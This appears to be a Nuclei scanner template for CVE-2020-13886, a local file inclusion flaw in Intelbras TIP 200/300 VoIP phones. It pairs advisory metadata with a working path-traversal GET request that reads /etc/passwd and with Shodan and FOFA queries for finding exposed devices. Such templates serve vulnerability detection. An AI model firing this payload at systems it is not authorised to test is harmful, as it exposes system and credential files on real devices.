id: CVE-2020-13886 info: name: Intelbras TIP 200/200 LITE/300 - Local File Inclusion author: ritikchaddha severity: high description: | Intelbras TIP 200 60.61.75.15, TIP 200 LITE 60.61.75.15, and TIP 300 65.61.75.22 are vulnerable to local file inclusion via the 'page' parameter in /cgi-bin/cgiServer.exx, allowing unauthenticated attackers to read arbitrary files such as /etc/passwd. impact: | Unauthenticated attackers can read arbitrary files including sensitive configuration files and credentials, potentially leading to complete device compromise. remediation: | Update the device firmware to the latest version provided by Intelbras. reference: - https://lucxs.medium.com/cve-2020-13886-lfi-voip-intelbras-d30f27a39b22 - https://nvd.nist.gov/vuln/detail/CVE-2020-13886 classification: cve-id: CVE-2020-13886 cwe-id: CWE-22 epss-score: 0.01809 epss-percentile: 0.83158 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 metadata: verified: true max-request: 1 vendor: intelbras shodan-query: html:"/cgi-bin/cgiServer.exx" fofa-query: body="/cgi-bin/cgiServer.exx" tags: cve,cve2020,intelbras,tip200,tip300,lfi,vuln http: - raw: - | GET /cgi-bin/cgiServer.exx?page=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "regex('root:.*:0:0:', body)" - "status_code == 200" condition: and # digest: 4b0a00483046022100ad4581257281d0c2335ddabb4a316686c94c3a7319a9bddd576751323b18df060221008ff43df186e6afb844834c1d6bffac4f1629688ca6df341a21fb93744c40f95e:922c64590222798bb761d5b6d8e72950